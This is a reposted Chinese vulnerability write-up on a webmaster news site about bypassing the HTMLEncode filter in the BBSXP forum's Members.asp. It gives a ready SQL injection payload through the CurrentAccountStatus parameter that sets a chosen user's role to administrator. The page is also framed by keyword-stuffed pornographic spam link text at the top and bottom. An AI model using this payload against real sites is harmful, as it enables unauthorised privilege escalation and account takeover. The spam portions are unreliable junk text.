精品免费在线观看-精品欧美-精品欧美成人bd高清在线观看-精品欧美高清不卡在线-精品欧美日韩一区二区

17站長網

17站長網 首頁 安全 漏洞分析 查看內容

BBSXP繞過過濾繼續注入漏洞分析

2022-9-27 15:29| 查看: 2324 |來源: 互聯網

漏洞分析: 官方最新過濾函數HTMLEncode,這次過濾了字符* ,再一次繞過過濾注射 Function HTMLEncode(fString) fString=Replace(fString,CHR(9),"") fString=Replace(fString,CHR(13),"") fString=Replace(fStri
漏洞分析:
官方最新過濾函數HTMLEncode,這次過濾了字符* ,再一次繞過過濾注射
Function HTMLEncode(fString)
fString=Replace(fString,CHR(9),"")
fString=Replace(fString,CHR(13),"")
fString=Replace(fString,CHR(22),"")
fString=Replace(fString,CHR(38),"&") '“&”
fString=Replace(fString,CHR(32)," ") '“ ”
fString=Replace(fString,CHR(34),""") '“"”
fString=Replace(fString,CHR(39),"'") '“'”
fString=Replace(fString,CHR(42),"*") '“*”
fString=Replace(fString,CHR(44),",") '“,”
fString=Replace(fString,CHR(45)&CHR(45),"--") '“--”
fString=Replace(fString,CHR(60),"<") '“<”
fString=Replace(fString,CHR(62),">") '“>”
fString=Replace(fString,CHR(92),"\") '“\”
fString=Replace(fString,CHR(59),";") '“;”
fString=Replace(fString,CHR(10),"
")
fString=ReplaceText(fString,"([&#])([a-z0-9]*);","$1$2;")
if SiteConfig("BannedText")<>"" then fString=ReplaceText(fString,"("&SiteConfig("BannedText")&")",string(len("&$1&"),"*"))
if IsSqlDataBase=0 then '過濾片假名(日文字符)[\u30A0-\u30FF] by yuzi
fString=escape(fString)
fString=ReplaceText(fString,"%u30([A-F][0-F])","0$1;")
fString=unescape(fString)
end if
HTMLEncode=fString
End Function
Members.asp漏洞文件作為測試:
SearchType=HTMLEncode(Request("SearchType")) //第8行
SearchText=HTMLEncode(Request("SearchText"))
SearchRole=RequestInt("SearchRole")
CurrentAccountStatus=HTMLEncode(Request("CurrentAccountStatus"))
......
if SearchText<>"" then item=item&" and ("&SearchType&" like '%"&SearchText&"%')" //第18行
......
if CurrentAccountStatus <> "" then item=item&" and UserAccountStatus="&CurrentAccountStatus&"" //第22行

if item<>"" then item=" where "&mid(item,5)
......
TotalCount=Execute("Select count(UserID) From ["&TablePrefix&"Users]"&item)(0) '獲取數據數量
//第54行

看個sql語句:
select * from bbsxp_users where userid=(1)update[bbsxp_users]set[userroleid]=(1)where(username=0x79006C003600330036003400)
變量userid繞過過濾成功執行了update
同理構造:
SearchType=1
SearchText=1
CurrentAccountStatus=(1)update[bbsxp_users]set[userroleid]=(1)where(username=0x79006C003600330036003400)
本文最后更新于 2022-9-27 15:29,某些文章具有時效性,若有錯誤或已失效,請在網站留言或聯系站長:[email protected]
·END·
站長網微信號:w17tui,關注站長、創業、關注互聯網人 - 互聯網創業者營銷服務中心

免責聲明:本站部分文章和圖片均來自用戶投稿和網絡收集,旨在傳播知識,文章和圖片版權歸原作者及原出處所有,僅供學習與參考,請勿用于商業用途,如果損害了您的權利,請聯系我們及時修正或刪除。謝謝!

17站長網微信二維碼

始終以前瞻性的眼光聚焦站長、創業、互聯網等領域,為您提供最新最全的互聯網資訊,幫助站長轉型升級,為互聯網創業者提供更加優質的創業信息和品牌營銷服務,與站長一起進步!讓互聯網創業者不再孤獨!

掃一掃,關注站長網微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        主站蜘蛛池模板: 亚洲你xx我xx网站 | 亚洲欧美精品伊人久久 | a丫久久久久久一级毛片 | 久久综合免费视频 | 免费一级网站 | 欧美骚b | 手机看片国产欧美日韩高清 | 久久精品免费一区二区三区 | 亚洲欧美色中文字幕 | 777国产精品永久免费观看 | 久爱www免费人成福利播放 | 精品国产999 | 免费一级毛片在线播放视频 | 美女三级黄 | 欧美人成一本免费观看视频 | 亚洲自偷自偷精品 | 亚洲wuma| 国产一级特黄在线播放 | 久草资源福利 | 国产丁香婷婷妞妞基地 | 色视频在线观看 | 在线视频不卡国产在线视频不卡 | 亚洲综合性 | 小明看看主页 | 国产亚洲自拍一区 | 大狠狠大臿蕉香蕉大视频 | 欧美视频在线观看免费精品欧美视频 | 国产乱理论片在线观看理论 | 国产精品久久久久久久久免费 | 久久精品一区 | 久久久久久天天夜夜天天 | 欧美激情精品久久久久久久 | 天天摸一摸视频寡妇 | 国产精品亚洲精品一区二区三区 | 欧美一级色 | 高清国产一级毛片国语 | 特黄的欧美毛片 | 久久激情免费视频 | 国产成人精品免费视频动漫 | 91porn在线观看国产 | 成人在线免费看 |